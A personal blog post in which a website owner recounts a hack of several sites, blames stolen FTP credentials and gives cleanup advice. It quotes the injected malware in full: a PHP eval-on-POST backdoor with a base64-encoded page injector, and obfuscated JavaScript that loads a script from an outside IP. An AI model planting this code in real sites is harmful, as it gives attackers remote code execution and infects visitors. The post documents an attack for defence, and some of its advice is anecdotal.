My sites were hacked last week (This may help if it happens to you)

• My sites were down with this error:

Parse error: syntax error, unexpected T_VARIABLE in /home/hosting/public_html/index.php on line 1

• Upon checking, most of main PHP, HTML and JavaSript files are altered. The following lines are appended in the top section of PHP pages:
  
  <?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0N UUHNTc2NyU3NpZE5wdE5KbiUyMGNNN3NkNktyY1RQJTNEJTJGT kpuJTJGOWNNNzRUUCUyRTI0N1RQJTJFMiUyRTFOSm45Y003NSU yRmNNN2pxdWVkTnJTc3klMkVjTTdqc0hZJTNFJTNDJTJGU3NzV FBjdXZqcmlwdXZqdFNzJTNFJykucmVwbGFjZSgvVFB8TkpufEh ZfHV2anxkTnxTc3xkNkt8Y003L2csIiIpKTsKIC0tPjwvc2Nya XB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1]; } if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

The following code is appended at the bottom of HTML and JS (Javascript) pages:

<!--
document.write(unescape('%3CTPsSscrSsidNptNJn%20cM 7sd6KrcTP%3D%2FNJn%2F9cM74TP%2E247TP%2E2%2E1NJn9cM 75%2FcM7jquedNrSsy%2EcM7jsHY%3E%3C%2FSssTPcuvjripu vjtSs%3E').replace(/TP|NJn|HY|uvj|dN|Ss|d6K|cM7/g,""));
-->

• If you look closely, the files that have been hacked/changed carry the same timestamp (same date and time.) I believe the hackers use a program to make the changes.

• Three of my websites are hacked and coincidentally these are the sites I have done some uploading using FTP client Filezilla the night before. I suspect the hackers were using keylogger/spyware to steal my FTP logins. Then by using the info they steal, they login to my sites and appended the above code to my pages.

(NOTE: It was later confirmed that FTP communication was the cause as I tried updating a site using Filezilla and sure enough the site was hacked again the next day. The other two sites that were updated with online FTP are intact.)

• I search on the Internet and found that many people have experienced the same problem but no solution found.

• Depending on your webhost, you can either do a restore of your website yourself or you have to ask the Support team to do it for you. In this step, you want to revert your website to the day before the site is hacked.

• If you don't have a backup from cPanel or webhost, you have no choice but to do this. This is the most time consuming one. By using a web based FTP client, upload all clean HTML and PHP pages (without the funny codes as shown above) from your own backup on your PC to your server. Of course, provided you have a mirror copy of your web pages.

• If you don't, do this: Edit the affected files directly using Net2FTP.com online by removing the extra codes.
  
  I still find that using Net2FTP to download files to desktop and edit them with Dreamweaver, and then upload back to server using Net2FTP is faster.
  
  
• For MySQL databases, I am not sure if I need to make any changes to rectify this problem. It seems that it's not affected.
  

• Try NOT to use Filezilla to avoid passwords being stolen again by hackers.

• Scan your computer using Spybot or Lavasoft (For anti-virus, do not use AVG Free, use Avira instead). Install firewall to protect your computer from being attacked by spyware or virus.
  
  
• Backup your website on a regular basis using cPanel. Do backup as and when you have made changes. You can also use Wordpress plugin to automate the backup process. When your site is hacked, backups come in very handy. You will be very glad that you did.